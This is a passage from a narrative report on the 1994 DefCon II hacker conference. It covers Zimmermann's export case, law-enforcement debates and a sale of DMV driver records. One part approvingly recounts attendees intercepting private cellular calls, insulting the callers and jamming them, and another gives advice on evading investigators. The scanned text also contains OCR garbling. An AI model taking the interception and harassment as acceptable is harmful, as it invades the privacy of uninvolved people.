explains it, alright! Sorry for the aspersions, Mark. 


But Jeff didn’t have a back up plan. He was screwed. Almost four 
hundred people in the audience and nothing to tell them. So, and 
I can’t quite believe it, one human being who had obviously never 
stood in front of a live audience before got up in an impromptu 
attempt at stand up comedy. The audience was ready for almost 
anything entertaining but this guy wasn’t. Admittedly it was a 
tough spot, but 


"How do you turn a 486 into an 8088?" 


"Add Windows." Groan. Groan. 


"What’s this?" Picture the middle thr fingers of your right 
hand wiggling madly. 


"An encrypted this!" Now hold out just the middle finger. 
Groan. Groan. 
"What’s this?" Spread your legs slightly apart, extend both 


hands to the front and move them around quickly in small circles. 


"Group Air Mouse." Groan. 


The evening groaned on with no Mark nor any able sharp witted 
comedian in sight. 


Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ himself
to much of the global electronic world. Preferring to call
himself a folk hero (even the Wall Street Journal used that term)
Phil’s diminutive height (combined with a few too many pounds) and
a sweet as sweet can be smile earn him the title of Pillsbury
Dough Boy look alike. Phil is simply too nice a guy to be embroiled
in a Federal investigation to determine if he broke the
law by having PGP put on a net site. You see, the Feds still
think they can control Cyberspace, and thereby maintain antique
export laws: "Thou shalt not export crypto without our approval"
sayeth the NSA using the Department of Commerce as a whipping boy
mouth piece. So now Phil faces 41-51 months of mandatory jail
time if prosecuted and convicted of these absurd laws.


Flying in from Colorado, his appearance was anxiously awaited.
"He’s really coming?" "I wonder what he’s like?" (Like everyone
else, fool, just different.) When he did arrive, his shit-eating
grin which really isn’t a shit-eating grin, it’s just
Phil’s own patented grin, preceded him down the hallway.


"Here he is!" "It’s Phil Zimmerman." Get down and bow. "Hey, 
hil the PGP dude is here." 


tg 


He was instantly surrounded by those who recognize him and by 
those who don’t but want to feel like part of the in-crowd. 
Cc 
a 


hat chat, shit-eating grin, good war stories and G-rated pleas\037 
ntries. Phil was doing what he does best: building up the folk 
hero image of himself. His engaging personality (even though he 
can’t snorkel to save his ass) mesmerized the young-uns of the 
group. "You’re Phil?" 


"Yeah." No arrogance, just a warm country shit-eating grin 
that’s not really shit-eating. Just Phil being Phil. He plays 
the part perfectly. 


Despite the attention, the fame, the glory (money? nah . . .) the 
notoriety and the displeased eyes of onlooking Computer Cops who 
really do believe he belongs in jail for 4 years, Phil had a 
problem tonight. A real problem. 


"I don’t have a room!" he quietly told Jeff at the desk. "They 
say I’m not registered." No panic. Just a shit-eating grin 
that’s not a shit-eating grin and hand the problem over to the 
experts: in this case Jeff Moss. Back to his endearing fans. 
Phil is so damned kind I actually saw him giving Cryptography 101 
lessons on the corner of a T-shirt encrusted table. "This is 

plaintext and this is crypto. A key is like a key to your hotel 
rooms ¢ .." If only Phil had a hotel room. 

Someone had screwed up. Damn computers. So the search was on. 


What had happened to Phil’s room? Jeff is scrambling and trying 
to get the hotel to rectify the situation. Everyone was abuzz. 
Phil, the crypto-God himself was left out in the cold. What 
would he do? 


When suddenly, out of the din in the halls, we heard one voice 
above all the rest: 


"Phil can sleep with me!" 


Silence. Dead stone cold silence. Haunting silence like right
after an earthquake and even the grubs and millipedes are so
shaken they have nothing to say. Silence.


The poor kid who had somehow instructed his brain to utter the
words and permitted them to rise through his esophagus and out
over his lips stood the object of awe, incredulity and mental
question marks. He must have thought to himself, "what’s everyone
staring at? What’s going on? Let me in on it." For the
longest 10 seconds in the history of civilization he had absolutely
no clue that he was the target of attention. A handful of
people even took two or three steps back, just in case. Just in
case of what was never openly discussed, but nonetheless, just in
case.


And then the brain kicked in and a weak sheepish smile of guilt
overcame this cute acne-free baby-butt smooth-faced hacker who
had certainly never had a shave, and was barely old enough to
steer his own pram.


"Ohhhhhh . . . . noooooo," he said barely louder than a whisper.
"That’s not what I mean!"


I nearly peed laughing so hard in unison with a score of hackers
who agreed that these misspoken words put this guy in the unenviable
position of being the recipient of a weekend of eternal
politically incorrect ridicule.


"Yeah, right. We know what you mean... " 


"No really .. ." he pleaded as the verbal assaults on his = al\037 
leged sexual preferences were slung one after the other. 


This poor kid never read Shakespeare: "He who doth protest too 
MUGh: Gee 4°" 


If we couldn’t have a great kickoff speech, or comedian, this 
would have to do. 


The majority of the evening was spent making acquaintances: 


"Hi, I’m Jim. Oops, I mean ’Septic Tank," was greeted with "Oh, 
you’re Septic. I’m Sour Milk." (Vive la difference!) Peopl who 
know each other electronically are as surprised to meet their 
counterparts as are first daters who are in love with the voice 
a 
t 


t the other end of the phone. "Giving good phone" implies one 
hing while "Having a great keystroke" just might mean another. 


The din of the crowd was generally penetrated by the sounds of a
quasi-pornographic Japanese high tech toon of questionable socially
redeeming value which a majority of the crowd appeared to
both enjoy and understand. I am guilty of neither by reason of
antiquity.


And so it goes. 


* * * * *


Phil Zimmerman must have gotten a room and some sleep because at
10AM (or closely thereafter) he gave a rousing (some might say
incendiary) speech strongly attacking the government’s nearly
indefensible position on export control.


I was really impressed. Knowing Phil for some time, this was the
first time I ever heard him speak and he did quite an admirable
job. He ad libs, talks about what he wants to talk about and does
so in a compelling and emotional way. His ass is on the line and
he should be emotional about it. The audience, indeed much of
counter culture Cyberspace loves Phil and just about anything he
has to say. His affable 40-something attorney from Colorado,
Phil DuBois was there to both enjoy the festivities and, I’m
sure, to keep tabs on Phil’s vocalizations. Phil is almost too
honest and open for his own good. Rounds and rounds of sincere
appreciation.


Hey kids, now it’s time for another round of Spot The Fed.
Here’s your chance to win one of these wonderful "I Spotted A
Fed" T-shirts. And all you have to do is ID a fed and it’s yours.
Look around you. Is he a Fed? Is she under cover or under the
covers? Heh, heh. Spot the Fed and win a prize. This one-size-fits-all
XXX Large T-shirt is yours if you Spot the Fed. I had
to keep silent. That would have been cheating. I hang out on
both sides and have a reputation to maintain.


"Hey, I s one" screeched a female voice (or parhaps it was 
Phil’s young admirer) from the left side of the 400+ seat ball\037 
room. Chaos! Where? Where? Where’s the fed? Like when Jose 


Consenko hits one towards the center field fenc and 70,000 
screaming fans stand on their seats to get a better view of a 
three inch ball 1/4 mile away flying at 150 miles per hour, this 
crowd stood like Lemmings in view of Valhalla the Cliff to espy 
the Fed. Where’s the Fed? 


Jeff jumped off the stage in anxious anticipation that yet another
anti-freedom-repressive law enforcement person had blown his
cover. Where’s the Fed? Jeff is searching for the accuser and
the accused. Where’s the Fed? Craned necks as far as the eye
can see; no better than rubber neckers on Highway 95 looking for
streams of blood and misplaced body parts, they half expected a Fed
to be as distinctly obvious as Quasimodo skulking under the
Gargoyled parapets of Notre Dame. No such luck. They look like
you and me. (Not me.) Where’s the Fed?


He’s getting closer, closer to the Fed. Is it a Fed? Are you a
Fed? C’mon, fess up. You’re a fed. Nailed. Busted. Psyche!


Here’s your T-shirt. More fun than Monty Hall bringing out
aliens from behind Door #3 on the X-Files. Good clean fun. But
they didn’t get ’em all. A couple of them were real good. Must
have been dressed like an Hawaiian surf bum or banshee from
Hellfire, Oregon. Kudos to those Feds I know never got spotted.
Next year, guys. There’s always next year.


Phil’s notoriety and the presence of the Phoenix, Arizona prosecutor
who was largely responsible for the dubiously effective or
righteous Operation Sun Devil, Gail Thackeray ("I change jobs
every 4 years or so - right after an election") brought out the
media. The LA TV station thought they might have the makings of
a story and sent a film crew for the event.


"They’re Feds. The ones with the cameras are Feds. I know it. Go 
ask ’em." No need. Not. 

"Put away that camera." At hacking events it’s proper tiquett 
to ask if people are camera shy before shooting. The guy that I 


was sitting next to buried his face in his hands to avoid being 
captured on video tape. 


"What are you; a Fed or a felon?" I had to ask. 
"What’s the difference," his said. "They’re the same thing." So 


which was it, I wondered. For the truly paranoid by the truly 
paranoid. 


"Get that thing outta here," he motioned to the film crew who 
willingly obliged by turning off the lights. "They’re really 
Feds," he whispered to me loud enough for the row in front and 
behind us to hear. 


I moved on. Can’t take chances with personal safety when I have 
kids to feed. Fed or felon, he scared me. 


Gail Thackeray was the next act on stage. She was less in agreement
about Phil Zimmerman than probably anyone (except the undetected
Feds) in the audience. She, as expected, endorsed much of
the law enforcement programs that revolve around various key
management (escrow) schemes. Phil recalls a letter from Burma
that describes how the freedom fighters use PGP to defend themselves
against repression. He cites the letter from Latvia that
says electronic freedom as offered by PGP is one of the only
hopes for the future of a free Russia. Gail empathizes but sees
trouble closer to home. Terrorism a la World Trade Center, or
rocket launchers at O’Hare Airport, or little girl snuff films in
Richmond, Virginia, or the attempt to poison the water supply
outside of Boston. These are the real threats to America in the
post Cold War era.


"What about our personal privacy!" cries a voice. "We don’t want
the government listening in. It’s Big Brother 10 years behind
schedule."


Gail is amused. She knew it would be a tough audience and has
been through it before. She is not shaken in the least.


"I’ve read your mail," she responds. "It’s not all that interesting."
The audience appreciates a good repartee. "You gotta pay
me to do this, and frankly most of it is pretty boring." She
successfully made her point and kept the audience laughing all the
way.


She then proceeded to tell that as she sees it, "The expectation
of privacy isn’t real." I really don’t like hearing this for I
believe in the need for an Electronic Bill of Rights. I simply
think she’s wrong. "History is clear," she said "the ability to
listen in used to be limited to the very few. The telegraph was
essentially a party line and still today in some rural areas
communications aren’t private. Why should we change it now?"


"Gail, you’re so full of shit!" A loud voice bellowed from next
to me again. Boy can I pick seats. "You know perfectly well that
cops abuse the laws and this will just make their jobs easier.
Once people find a way to escape tyranny you all want to bring it
right back again. This is revolution and you’re scared of losing.
This kind of puke scum you’re vomiting disgusts me. I just
can’t take it any more." Yeah, right on. Scattered applause.
While this ’gent’ may have stated what was on many minds, his
manner was most unbefitting a conference and indeed, even DefCon
II. This was too rude even for a hacker get-together. The man
with the overbearing comments sat down apologizing. "She just
gets me going, she really does. Really pisses me off when she
goes on like about how clean the Feds are. She knows better than
to run diarrhea of the mouth like that."


"You know," she continued. "Right across the street is a Spy
Shop. One of those retail stores where you can buy bugs and taps
and eavesdropping equipment?" The audience silently nodded. "We
as law enforcement are prohibited by law from shopping there and
buying those same things anyone else can. We’re losing on that
front." Cheers. Screw the Feds.

(Cyber Christ Meets Lady Luck Continued)


I don’t agree with everything that Gail says, but she is a compelling
speaker; she believes in what she says. But I do agree
with her on the difficulty of forensic evidence in computer
cases.


"I got really mad," she said. "I was reading a magazine and 
there was an ad for United, you know, th mploy owned airline. 
And it was a beautiful ad, hundred of employees standing in front 

of a brand new great big jet. All smiling and happy." Gail then 

frowned deeply. "Some stockholder ought to sue them for mislead\037 
ing advertising." This was more like it! Go, Gail! "I started 
t 
f 
W 


o look at the picture carefully and I noticed this unmistakably 
at lady in a pink dress. And then over a few persons. . -guess 
hat? The same fat lady in pink." Roars of laughter and ap\037 
plause. 


Her point? What seems real may not be real at all, and with a few 
hundred dollars in software and a little practice, most anyone 
can build a false reality digitally. 


Her time was up but the audience wanted more. She was mobbed for 
eternity by hackers who fight her tooth and nail but respect her 
comportment enough to make the disagreements lively, partisan, 
entertaining, but with respect. Respectful hackers. No HoHoCon 
orgies; merely verbal barbs with no solution. Everyone knew that, 
but it’s the battle that counts. 


More security conferences should be this open, this honest and
informative, with all kinds of people with all kinds of opinions. 
That is how we, and I, learn. Listen and learn. And all for 
$5000 no less, plus a paltry $15 entrance fee. 


* * * * *


The afternoon sessions were filled with a mixture of anti-government,
pro-privacy advocacy, virus workshops and such by both
under and above ground folks. Padgett Peterson’s knowledge of
viruses is deep and he spread the same wisdom as he does in so
called legitimate circles. Knowledge is knowledge, and better
accurate than wrong.


It’s often surprising to see how people will voice the same
opinion in varying degrees of intensity depending upon their
audience. Mark Aldrich of General Research Corp. in the Washington
area made a statement that I doubt I would hear at a ConCon.
"Fear your government that fears your crypto. Use crypto as
a weapon." Sara Gordon’s panel discussion on crypto and privacy
and related topics fueled the audience’s general anti-fed attitude.


"IT was bugged by the Feds." "So was I?" "What can we do about 
a "Yeah, they listen in on my phones, too. I can hear the 
elacks:.™ Right: 


As Mark so succinctly put it, "if the government wants to bug
you, you’ll never know. They’re that good." That kind of shut
up the dilettante paranoids in the group, albeit mumbling that
they just knew that they were the victim of one of the 900 or so
court approved wire taps last year. Right. I think Gail was
right: some of you guys are too boring to be believed.

The afternoon edition of the Spot A Fed contest took us on the
run. I actually succumbed to their enthusiasm and a general lack
of better judgement and followed a group of 8 or 10 to unmask an
unmarked white van in the parking lot.


"It’s the Feds." "How do you know?" "Oh, it’s the Feds alright." 
"How do you know." "It’s a white van and the intelligenc serv\037 
ices use white vans." "What are you going to do?" "Bust ‘’em." 
"Bust ’em for what?" "For being Feds." 


This motley crew traipsed through the mile long casino, trodding
upon the ugly tartan/paisley carpets so obnoxiously loud a blind
man could cry "Uncle!", into the Hall of Overpriced Shoppes
through the lobby and over to the parking garage. We had to have
$100,000 of surveillance gear in tow (enough to detect the planet
Pluto fart in b-flat). Radio receivers and eavesdropping equipment
were courtesy of my pal Mike Peros. The goal was, if this
was a Fed van, we could hear it. I don’t think so, but I go for
the ride and a few minutes of reprieve away from the conference
hall.


As we near, the excitement grows among the more paranoid who are 
trying to instill their own mental foibles into their companions 
and sheer terror in normal old Vegas visitors who have no idea
what they’ve walked into. 


Feds? Not. Surreptitious radio transmissions? Just hotel security
tracking the movements of 8 or 10 paranoids (and one writer
with nothing else to do for a half hour) into a parking garage
which has more cameras than NBC. Feds? Of course not. Don’t be
ridiculous.


* * * * *


To say nothing worthwhile occurred until 11PM that evening would
be lying, but this thing, this DefCon II thing, was turning into
what I would have called 25 years ago, a Love-In. The participants
were giddy from the event, the camaraderie, the $1 Heinekens
and the hacking. The Sahara was actually pretty good about
it. Jeff got the conference space for free because he guaranteed
that at least 100 hotel rooms would be booked by "computer enthusiasts
coming to a small computer conference." Little did the
hotel know that half the crowd was too young to drink, too broke
to gamble, and conspicuous enough to ward off legitimate clients.
But a deal’s a deal.


The hotel operators went out of their way and allegedly gave the 
hackers permission to hack through the PBX in order to provide a 
SLPP connection. 


"Just put it back the way you found it when you’re done," was the 
hotel’s only and quite reasonable request. 


In my day an equivalent event producing an equivalent social
non-drug induced high would have been achieved by tossing a Frisbee
to Grace Slick (Lead singer Jefferson Airplane) and have her
throw it back. We didn’t have the kind of technology that today’s
rebellious age has. We had the Beatles and Jimi Hendrix, safe
sex (kinda), safe drugs (well, maybe a little safer) and a cause.
But no technology to speak of.


When I was on the publishing staff of the New York City Free
Press in 1968/9 we wrote our anti-establishment diatribes by
hand. By hand! And then we went down to a dark office late at
night to use their typesetting gear when it was idle. It took no
more than a blushing glance around the room to realize that we
impressionable teens were publishing our political extremisms on
equipment courtesy of Al Goldstein and Screw magazine. Now that
was an education.


DefCon II was a Love-In, technology and all. 


Come 11PM yet another speaker canceled so I offered to chat to
the crowd for a half hour or so on Van Eck radiation; the emissions
from CRT’s that make video screens readable from a distance.
Now this wasn’t a fill in at 2PM or anything. Sessions
reconvened at 11PM and I spoke to a full audience who were there
to get a midnight lesson in cellular hacking.


Most above ground types still believe that hacking is an
acne-faced teenager, chugging Jolt Cola, wolfing down pepperoni
pizza and causing Corporate America no end of grief. To a certain
extent some of this is true. But hacking is so much more.
As Rop Gonggrijp, editor of Hacktic once told me, "hacking is
disrespect of technology." It’s going the extra mile to find out
how things work. Many of the older hackers, those in their early
20’s and older, are migrating from the conventional dial-em-up
and break-in hacking image to the fine art of cellular hacking.
How do these things work? What are the frequencies? How can I
customize my phone? How many channels can I scan? The possibilities
are endless as I soon learned.


Jim and Bill (fake names) asked if I wanted to see a great demo.
Sure! No names, they said. OK. No problem. In one of the
several thousand hotel rooms at the Sahara was a pile of equipment
to make an under budgeted FBI surveillance team insanely
jealous. There in the middle of the ridiculously filthy room that
no doubt caused the maid to shudder, sat a log periodic antenna
poised atop a strong and highly adjustable photographic-style
tripod. Feeding the antenna was a hunk of coax attached to a
cell phone’s antenna jack.


OK, so what’s that? Free cell calls? No, much more. 


A second cell phone/scanner, an Oki 900 was modified and connected
to a laptop computer. (This was the exact modification being
discussed downstairs.) Custom software that was freely distributed
around DefCon scanned the data from the Oki and displayed
the scanning activity. A pair of speakers then audibly broadcast
the specific conversation. And in Vegas, you can imagine what
was going over the open airwaves!


A half dozen ’kids’ sat around enthralled, each begging for his
turn to, as Jim put it, "harass cellular users. Pure and simple.
Harassment. Stomp on the son of a bitch," he laughed, joined in
by the others.


When a ’good’ conversation was detected, they entered the channel
into the broadcasting cell phone and spoke. And talk they did.
Essentially they turned ’private’ conversations into wide-band
free-for-alls. If they spoke for only a few seconds one or both
of the parties could hear what was being said. If they talked
for too long, the overpowering signal from the antenna would
literally wipe out the chat: the cell switch reacted with an
internal belch and shut down. Stomping, they called it.


For those on the receiving end of the harassment, it must have 
sounded like the overbearing voice of God telling Noah how to
build the Ark. 


"Noah?" 


"Who dat? 
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"Noah?" 
"Who is that?" 
What terror lurks in the minds of boys 


For those old enough to remember, stomping is no more a stunt
than putting a 500 watt linear power amplifier on a CB radio and
blasting nearby CB’s to kingdom come. The truckers used to do it
to 4-wheelers. When the police began monitoring CB channels "to
protect and serve" they became the target of CB stomping. So
what else is new?


I gotta give it to them: these characters designed and built the
software, modified the phones and put it all together and it
works! Not bad on a $3 allowance and a 10th grade education.
Now, I guess what they did may have been sort of illegal, or at
least highly unethical and definitely not nice. But I have to
admit, some of what I witnessed was very, very, funny. I’m not
advocating this kind of activity, but much like Candid Camera
broke into people’s lives to capture their reactions, cellular
hacking is similarly amusing. The hacker/phreaks particularly
enjoyed breaking in on fighting couples. (I counted six impending
divorces.) Almost without exception the man was in a car and
the lady was at a fixed location; presumably, home.


Him: "Where the hell have you been." 

Her: "Nowhere." 

Him: "Bullshit. 

Her: "Really honey . .." Defensively. 

Him: "Who’s with you?" Intense anger. 
Hacker: "Don’t believe her. She’s a whore." 
Him: "What was that?" 

Her: "What?" 


"That voice." 
"What voice?" 


Hacker: "Me you asshole. Can’t you see she’s playing you for a 
fool." 
"I know she is." He agrees. 


"What’s that honey?" 

"I know he’s there with you." 

"Who?" Incredulous. 

"Him . . . whoever you’re fucking when I’m at work." 
Hacker: "Yeah, it’s me." 


"Shit! Who the fuck is there?" 

"No one!" 

"I can hear him, he’s there. You’re both making fun of me..." 
Hacker: "She’s laughing at you, man." 

"No shit. Who the fuck are you?" 

Hacker: "The guy who takes care of her when you can’t, asshole." 
"That's, tt." “Click. 


Drug dealers aren’t immune to these antics. 


"Where’s the meet?" 

"By the 7/11 on Tropicana." 
"You got it?" 

"You got the cash?" 


"Yeah, dude." 

"Be sure you do." 

Hacker: "He doesn’t have the cash my man. He’s gonna rip you 
off." 

"What?" "What?" Both sides heard the intruder’s voice. "Who is 
that?" 


"What’s that about a rip-off?" 
"This ain’t no rip-off man." 
Hacker: "Yes it is. Tell ’em the truth. You gonna take his drugs 
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and shoot his ass. Right? Tell ’em." 

"You gonna rip me off?" 

"No, man!" 

"Your homeboy says you gonna try and rip me off?" 

"What home boy?" 

Hacker: "Me, you bozo drug freak. Don’t you know that shit can 
kill you?" 

Click. 


Good samaritanism pays off upon occasion. 


"Honey, hurry up." 

"I’m on the freeway. I’m coming." 

Hacker: "He’s late. lLet’s save her ass." 

"What was that?" "What did you say honey?" 

"He said he was going to save your ass." 

"Who did?" 

"The guy on the radio." (Technical ignorance abounds.) 

Hacker: "Me. You’re late and she’s scared so we’re gonna beat 
you there and make her safe." 

"Who the hell is that?" "Who?" "The guy with you?" "There’s no 
one here." "He says he’s gonna beat me there and pick you up." 
Hacker: "Damn right we are." 

"Hey, this is cool. Who’s there?" 

Hacker: "Cyber Christ talking to you from Silicon Heaven." 

"No shit. Really?" 

Hacker: "Yeah, (choke, choke,) really." 

"What’s happening, honey." 


"I don’t know, for sure. He says it’s God." 
"God!?!2" 
Hacker: "Close enough. Listen, you sound alright. Go get your 


woman, man Keep her safe." 
"No problem. Uh, thanks." 
Click. 


Around 4AM, I guess it was, the hacker/phreaks definitely helped 
out law enforcement. One end of the conversation was coming from 
inside a hotel, maybe even the Sahara. The other from another 
cell phone, most likely in the lobby. 


"What do you look like?" 

"I’m five foot nine, thinning brown hair and 180 pounds I wear 
round glasses and .." 

"I get the idea. Where are you now?" 

"I’m coming down the elevator now. What do you look like?" 

"I’m six foot one in my heels, have long blond spiked hair and 
black fishnet stockings." 


Hacker: "Don’t go man. It’s a bust." 
"What?" he said. 
Hacker: "Don’t go, it’s a bust. You don’t want your name in the 


papers, do ya?" 

"What the fuck?" she yelled. 

"There’s a guy who says this is a bust?" 
"Bust? What bust?" 


Hacker: "That’s the clue, man. She’s denying it. Of course it’s 
a bust. Is it worth a night in jail to not get laid?" 
"Shit." He whispers not too quietly to another male companion. 


"There’s some guy on the phone who says it’s bust. What should we 
do. 
Hacker: "I’m telling you man, don’t go," 


"This ain’t worth it. I’m going back upstairs." 
Click. 


A couple of hours later the same hooker was overheard talking to 
one of her work mates. 


"Then this asshole says it’s a bust. Cost me $300 in lost busi\037 
ness, shit." 
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"Y¥OUy» “BOO? Same shit been going on all night long. What the 
fuck?" 


Wow. And it seems like only this morning that my toilet exploded.


* * * * *


So what’s a perfectly groomed and slightly rotund 50-something 
convicted methamphetamine dealer doing at DefCon II with hundreds 
of impressionable teenagers? You might well ask. 


So I’ll tell you.


Sitting in yet another Saharan hell-hole of a room they unabashedly
market for $55 per night I encountered hackers #1 through #4
and this . . . I immediately thought, elderly gent. He said
nothing and neither did I, thinking that he might have been an
over aged chaperone for delinquent teens or perhaps even an
understanding Fed. But the gallon jug of whiskey was depleting
itself right before my eyes, as if a straw from Heaven sucked the
manna from its innards. Actually, it was Bootleg.


Not bootleg liquor, mind you, but Bootleg the felonious con from
Oregon. Apparently he got busted ’cause speed is and was against
the law, and crank is not exactly the drug choice of maiden aunts
nor school marms. "I’ve been a hacker longer than some of these
kids have been alive. It all started back in..." and Mike
"Bootleg" Beketic commenced on the first of hundreds of war-story
jail house tales to entertain him and us. Bootleg loves a good
story.

"Jail ain’t so bad," he bragged with a huge whiskey smile. "No 
one fucked with me. You gotta make friends early on. Then it’s 
OK." Good advice, I guess. "On parole I got slammed with a year 
for piss that didn’t pass." Gotta be clean, my man. Stay away 


from that shit. It’1ll1 kill you and your teeth will rot. 


Bootleg handed me form PROB-37, (Rev. 1/94) from the United 
States District Court, Federal Probation System. Grins from ear 
to ear. A badge of honor for villains, thieves, and scoundrels. 
Sounds like they need their own union. 


This was the official "Permission To Travel" form dated June 16,
1994 which gave Bootleg the legal right to travel from Oregon to
Las Vegas in the dead of the summer to attend a "computer convention."
The flight times were specific as were the conditions of
his freedom. He had to inform the local cops that he was in
town. In case any crimes occurred throughout the city of Las
Vegas during his sojourn, he was an easily identifiable suspect.


While he downed another Jack and coke I found out what Bootleg
was really doing. Despite the fact that the "Federal Keep Track
of a Crook Travel Form" said, "you are prohibited from advertising
or selling your DMV CD," the paranoia that runs rampant
through the minds of prison bureaucracy was actually in this case
quite correctly concerned.


"What’s a DMV CD?" 


"I’m glad you asked." I was set up. The edict said he couldn’t 
sell or advertise, but there was no provision stating that he 
couldn’t answer questions from an inquiring mind. 


Bootleg handed me a CD ROM: 


Bootleg Presents:
DMV


- Over 2 Million Oregon Drivers License Records
- Over 3 Million Oregon License Plate Records


The inside jacket clearly stated that this information was not to
be used by any creatively nefarious types for any sort of personal
Information Warfare tactics. It warns,


Do not use this CD to: 


- Make phony Licenses
- Make phony Titles
- Obtain phony I.D.
- Harass Politicians, Cops or Journalists
- Stalk Celebrities
- Get ME in trouble <G>


I can come up with at least 1001 other uses for this collection
of information that the Oregon authorities are none too happy
about. The ones Bootleg outlined never came into my mind.
(Heh!) Bootleg acquired the information legally. State officials
were kind enough to violate the electronic souls of its citizens
by sending Bootleg their driver’s information magnetically
emblazoned on a 3600 foot long piece of 9 track acetate. Now they
want to change the law to reflect "heart felt concern for the
privacy of their citizens." Get a clue, or if none’s available,
buy one from Vanna.


Bootleg is moving onto the next 47 states (California and New 
York don’t permit this kind of shenanigans) shortly to make sure 
that everyone has equal access. Hacking? Of course. Bootleg 
effectively hacked the Oregon DMV with their blessing and tax 
payer paid-for assistance. 


Time to go back to my room while Bootleg and friends spent an 
evening of apparently unsuccessful whoring around the Strip and 
Glitter Gulch. 

A good time was had by all. 


* * * * *


Jeff Moss opened the Sunday morning session with an ominous 
sermon. 


"You’ll notice that the wet bar is missing from the rear?" It
had been there yesterday. Everyone turns around to look. "I
gotta pay for the damage ..." Jeff was not a happy camper.
"They have my credit card number and it’s almost full. So cool
it!" But the show must go on and we had more to learn.

Next. Anonymous mailers on the net? Forget about it. No such
thing. Anonymous remailers, even if they are in Norway or Finland
or some such other country where American information contraband
such as child pornography is legal, are only as safe and secure
as the people who run it.


"The FBI can go over any time they want and look up who you are 
and what kinds of stuff you swallow down your digital throat," 
one speaker announced. Of course that’s ridiculous. The FBI 
would have to call in the Boy Scouts or Russian Mafia for that 
kind of operation, but we all knew that anyway. A slight slip of 
the ad lib tongue. No harm done. 


I didn’t know, until this Sunday, that there were actually real
live versions of "Pump Up The Volume" running rampant across the
country, impinging their commercial-free low power radio
broadcasts into an electromagnetic spectrum owned and operated by the
Federal Communications Commission. And, as to be expected, the
FCC is trying to put these relatively harmless stations out of
business along with Howard Stern and Don Imus. One would think
that WABC or KLAC or any other major market stations would little
care if a podunk 20 watt radio station was squeezing in between
assigned frequencies. And they probably shouldn’t. But, as we
learned, the Military lent an innocent hand.


In support of the hobbies of servicemen, a local San Francisco 
base commander gave approval for a group of soldiers to establish 
a small, low power radio station for the base. Good for morale, 
keep the men out of the bars: you know the bit. 


But the ballistic missiles went off when the nation’s premier 
rating service, Arbitron, listed KFREE as a top local station in 
the San Francisco market. 


"What station KFREE?" "Who the hell are they?" "What the fuck?" 


Needless to say, KFREE was costing the legitimate radio stations
money because advertising rates are based upon the number of
listeners not up and peeing during commercials. Since KFREE was
ad-free, no contest. Arbitron assumes the rating to reflect the
existence of a real station - the numbers are there - and the
local stations call the FCC and the FCC calls the base and as
quick as you can scream, "Feds suck!" KFREE is off the air.


Stomp. 


I was scheduled to speak today, but with the schedule seemingly
slipping forward and backward at random haphazard intervals,
there was no telling when what would occur. Mark Ludwig, of
Virus Writing Contest fame and author of the much touted "Little
Black Book of Computer Viruses" gave a less than impassioned
speech about the evils of government.


"I know most of you don’t have any assets other than your
computer," Ludwig said to the poverty stricken masses of DefCon II.
"But you will, and you want to make sure the government doesn’t
come crashing down around you whenever they want. They can and
will take your life away if it suits them. There is no fourth
amendment. Most search and seizures are illegal." And so it
went.


"Put your money off shore, kids," said Dr. Ludwig the theoretical 
physicist. "Find a good friendly country with flexible banking 
laws and the Feds can’t get you." 


"And when the Feds do come for you, make sure that your entire
life is on your computer. Rip up the papers after you scan them
in. Your all-electronic life cannot be penetrated, especially
if you get a case of the forgets. ‘Oops, I forgot my password.
Oops! I forgot my encryption key. Oops! I forgot my name.’"


"Even your VISA and Mastercard accounts should be from overseas.
Keep it out of the US and you’ll be all the better for it." For
those interested in such alternatives, Ludwig recommends that you
call Mark Nestman of LPP Ltd. at 800-528-0559 or 702-885-2509.
Tell him you want to move your millions of rubles and dollars
and Cyber-credits overseas for safe keeping because the Byzantine
Police are at the front door as you speak. Order pamphlet 103.


These are the defensive measures we can take to protect ourselves
against the emerging Police State. But offensive action is also
called for, he says. "Help Phil Zimmerman. Send him money for
his defense. Then, laugh at the Feds!" Haha, haha. Haha.
Hahahahahaha. Ha!

"When they come to the door, just laugh at them." Haha. Hahaha.
Haha. "No matter what they do, laugh at them." Hahahahaha.
Enough of that, please. If I laugh at 6 husky beer-bellied 
Cyber-cops who have an arsenal of handguns pointed at my head, 
they might as well send me to the Group W bench to commiserate 
with Arlo Guthrie. Peeing would come before laughing. But then 
again, I’m no longer a grunged out 20 year old who can laugh in 
the face of the Grim Reaper. "Yes, ossifer, sir. I’m a cyber- 
crook. I ain’t laughing at you in your face, ossifer, sir..." 
I panic easily. Kissing ass well comes from a life long success 
of quid pro quo’ing my way from situation to situation. 


"And, now," Master Mark announced, "on to the results and awards
for the Annual Virus Writing contest." Ludwig seemed suddenly
depressed. "Unfortunately, we only got one legitimate entry."
One entry? The media plastered his contest across the media-waves
and the National Computer Security Association was planning
a tactical nuclear response. One entry? What kind of subversives
have 20 year olds turned into anyway? In my day (Yeah, I’m
old enough to use that phrase) if we called for a political
demonstration thousands would pile through the subway turnstiles
to meet a phalanx of well armed police appropriately attired in
riot gear. One entry? Come on X-Generation, you can do better
than that? No wonder the world’s going to shit. Don’t have
enough trouble from the young-uns. Sheeeeeeesssh!


Mark Ludwig’s politically incorrect virus writing contest may
have been a PR success but it was a business abortion. One
entry. Shit. At the NCSA meeting in Washington, rivaling
factions battled over how we as an association should respond.


"Hang the bastard." "He’s what’s wrong with world." "Put him in 
a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week and 
they’ll be able to squeeze him out between the bars."


C’mon you fools! Ignore him! Ignore him! If you don’t like what 
he has to say don’t egg him on. Ignore him. You want to do what 
the Feds did to poor Phil Zimmerman and make him a folk hero? 
Turning a non-event into the lead for the evening news is not the 
way to make something go away. I loudly advocated that he be 
treated as a non-entity if the goal was reduction to obscurity. 
I was right. 


Super-high priced PR and lobby firms had prepared presentations to
wage an all-out attack on Ludwig and his contest. I bet! And who
was going to pay for this? Peter Tippitt of Semantech ponied up
what I believe amounted to $7,000 to get the pot going. No one
else made a firm offer. Can’t blame them cause it would have been
no more effective than taking out an ad in Time proclaiming that
evil is bad. The PR firm would have made their fees, the event
would have made even more news and Ludwig would certainly have
had to make a judgement and choose from more than one entry.


But oddly enough, the one entry did not win. 


The winner of the Annual Virus Writing Contest was no less than
Bob Bales, Executive Director of the NCSA. Not that Bob wrote a
program, but if he had, Ludwig said, it would be called either
Don Quixote or Paranoia, and it would be of the human brain
attacking Meme type. The virus is a software equivalent of Prozac
to alleviate the suffering in middle-aged males who have no
purpose in life other than virus busting.


"Is Winn Schwartau here?" Mark asked the audience.


I was there. "Yo!" 


"Would you tell Bob that he’s won a plaque, and a $100 check and
a full year subscription to the Computer Virus Developments
